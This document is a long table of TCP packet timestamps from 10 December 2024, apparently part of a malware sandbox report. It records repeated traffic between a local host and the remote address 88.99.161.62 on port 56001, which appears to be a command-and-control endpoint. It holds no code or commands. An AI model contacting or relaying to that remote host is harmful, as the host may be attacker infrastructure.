                                                                              Dec 10, 2024 07:01:33.482919931 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.483066082 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.566600084 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.566772938 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.632119894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.632477999 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.632517099 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.717338085 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.717417002 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.781903982 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.782296896 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.867670059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.867820978 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.932830095 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.932862043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:33.933063030 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:33.933088064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.013794899 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.013962030 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.083754063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.163074970 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.163180113 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.189059973 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.229275942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.229319096 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.229363918 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.229415894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.301352024 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.301469088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.378473997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.378777027 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.379024029 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.453583956 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.517057896 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.517559052 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.600593090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.600709915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.669233084 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.750802994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.750972033 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.816252947 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.816270113 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:34.899056911 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.899158955 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:34.966882944 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.033221960 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.114460945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.114506960 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.114535093 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.181927919 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.182089090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.248997927 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.249313116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.353404999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.353477001 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.397598028 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.397639036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.397938967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.483064890 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.483242989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.568773985 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.569207907 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.632193089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.632265091 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.685339928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.698879957 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.699057102 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.766978025 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.767046928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.847682953 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.847724915 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.847779036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.919517994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.919615984 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:35.982491970 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.982671022 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.982701063 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:35.982719898 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.070755959 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.070842981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.135006905 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.135080099 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.217221975 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.217390060 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.286246061 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.286314011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.286575079 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.388322115 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.388422966 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.432749987 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.432792902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.433135033 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.534051895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.534168959 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.603936911 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.604161978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.687220097 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.687386036 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.749669075 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.749708891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.749737978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.750089884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.835730076 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.902750969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.902822971 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.903033972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:36.971103907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:36.971256971 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.051209927 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.051414013 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.130459070 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.130553961 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.187586069 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.187625885 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.267909050 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.268095016 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.345921993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.346230030 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.346287012 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.425972939 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.426054955 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.483474970 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.483527899 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.483838081 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.516664982 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.568280935 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.568449020 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.641483068 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.641746044 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.641786098 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.702538967 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.702644110 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.773236990 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.773457050 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.784667015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.853193045 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.918133974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.918282986 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:37.991002083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:37.991161108 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.029755116 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.068690062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.068734884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.068767071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.068793058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.136677980 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.136794090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.206471920 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.206547976 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.206818104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.287187099 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.287358999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.352288961 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.352330923 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.352552891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.465774059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.465842009 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.502741098 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.503106117 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.503153086 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.620002031 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.620198965 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.681209087 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.681679010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.681781054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.681807995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.791502953 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.791570902 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.835342884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.835510969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.835762978 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:38.939410925 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:38.939472914 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.006917953 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.007110119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.084498882 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.084604979 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.154870987 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.154915094 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.155209064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.224701881 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.224870920 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.300239086 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.300283909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.300311089 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.371381044 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.371495008 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.440479994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.440526009 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.440552950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.522311926 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.587059975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.587130070 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.655781031 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.655936956 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.737876892 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.738147974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.813719034 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.813879967 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:39.871239901 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.871584892 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.871623993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:39.955097914 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.029092073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.029138088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.029284000 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.029597998 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.103413105 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.170711994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.170756102 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.170785904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.171081066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.255853891 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.255961895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.319148064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.319195032 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.319221973 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.319447994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.388557911 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.388726950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.471314907 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.471589088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.471875906 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.539876938 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.539989948 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.604134083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.604357958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.604422092 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.670803070 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.670978069 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.755614042 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.755673885 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.825402021 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.887655973 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:40.974371910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:40.974538088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.040719032 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.040760994 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.040868044 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.121033907 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.121140003 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.190054893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.190100908 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.190129995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.190340996 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.190393925 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.274890900 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.275055885 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.337472916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.337517023 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.337759972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.425753117 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.425859928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.490546942 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.490711927 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.490742922 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.574512005 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.574675083 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.641266108 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.641588926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.724978924 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.790179968 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.790273905 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.790533066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.893852949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.894004107 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:41.940541029 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.940751076 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:41.940880060 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.038744926 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.109740973 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.109786987 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.172580004 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.172699928 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.254328966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.254371881 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.254601955 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.323338985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.323405981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.388040066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.388184071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.388195038 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.473042011 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.473217010 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.538813114 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.546005011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.607531071 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.688611031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.688676119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.688704967 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.756684065 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.822902918 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.822916031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.823046923 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.912671089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.912837029 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:42.972328901 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:42.972409010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.056236982 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.056345940 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.128180027 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.128360987 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.128391027 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.128669977 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.209109068 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.209284067 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.272052050 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.272099972 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.345057964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.424751997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.424797058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.424824953 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.492399931 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.492562056 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.563718081 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.563726902 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.563734055 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.592878103 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.627599001 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.627706051 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.707951069 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.708060026 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.708092928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.708367109 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.785505056 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.785624981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:43.843394995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.843406916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.853399038 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:43.853801966 CET4976156001192.168.11.2088.99.161.62
